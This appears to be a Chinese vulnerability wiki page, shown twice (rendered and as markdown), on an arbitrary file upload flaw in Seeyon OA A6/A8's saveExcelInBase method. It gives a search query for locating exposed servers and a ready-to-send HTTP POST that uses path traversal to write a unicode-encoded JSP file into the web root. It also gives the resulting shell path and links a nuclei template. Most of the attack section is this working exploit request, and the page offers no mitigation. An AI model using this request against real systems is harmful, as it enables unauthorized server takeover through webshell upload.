fofamini-wiki

登录白背景

源码

致远OA saveExcelInBase存在任意文件上传漏洞

一、漏洞简介

致远OA saveExcelInBase存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

致远OA A6+
致远OA A8+

三、资产测绘

hunterapp.name="致远 OA"
特征

四、漏洞复现

webshell需unicode编码

POST /seeyon/ajax.do;JSESSIONID=chat?method=ajaxAction&managerName=fileToExcelManager&rnd=12700 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2
Content-Length: 94
Connection: close

managerMethod=saveExcelInBase&arguments=["../webapps/ROOT/stc.jsp","",{"columnName":["\u003C\u0025\u0020\u006F\u0075\u0074\u002E\u0070\u0072\u0069\u006E\u0074\u006C\u006E\u0028\u0022\u0031\u0032\u0033\u0022\u0029\u003B\u0020\u0025\u003E"]}]

上传文件位置

/stc.jsp

nuclei脚本

致远OA-ajax-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/iytmv32880kr8qgu

# 致远OA saveExcelInBase存在任意文件上传漏洞

# 一、漏洞简介
致远OA saveExcelInBase存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本
+ 致远OA A6+
+ 致远OA A8+

# 三、资产测绘
+ hunter`app.name="致远 OA"`
+ 特征

![1702654441882-426cbc35-3df7-455b-a5e9-5f459acb5133.png](./img/NVCeK-_UztGT6F2x/1702654441882-426cbc35-3df7-455b-a5e9-5f459acb5133-198668.png)

# 四、漏洞复现
webshell需unicode编码

```plain
POST /seeyon/ajax.do;JSESSIONID=chat?method=ajaxAction&managerName=fileToExcelManager&rnd=12700 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2
Content-Length: 94
Connection: close

managerMethod=saveExcelInBase&arguments=["../webapps/ROOT/stc.jsp","",{"columnName":["\u003C\u0025\u0020\u006F\u0075\u0074\u002E\u0070\u0072\u0069\u006E\u0074\u006C\u006E\u0028\u0022\u0031\u0032\u0033\u0022\u0029\u003B\u0020\u0025\u003E"]}]
```

![1702654496188-123d7d29-9134-4dc3-be40-97aea918a5c0.png](./img/NVCeK-_UztGT6F2x/1702654496188-123d7d29-9134-4dc3-be40-97aea918a5c0-233210.png)

![1702654502227-47c050ad-403d-4fcd-844a-8afbd4aba68d.png](./img/NVCeK-_UztGT6F2x/1702654502227-47c050ad-403d-4fcd-844a-8afbd4aba68d-083688.png)

上传文件位置

```plain
/stc.jsp
```

![1702654529183-d306c4b2-99fa-4420-bb5f-02d9fd7d50e2.png](./img/NVCeK-_UztGT6F2x/1702654529183-d306c4b2-99fa-4420-bb5f-02d9fd7d50e2-882626.png)

nuclei脚本

[致远OA-ajax-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1730787588890-cdef3a67-54a4-4ed9-aac9-ca0db961edac.yaml)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iytmv32880kr8qgu>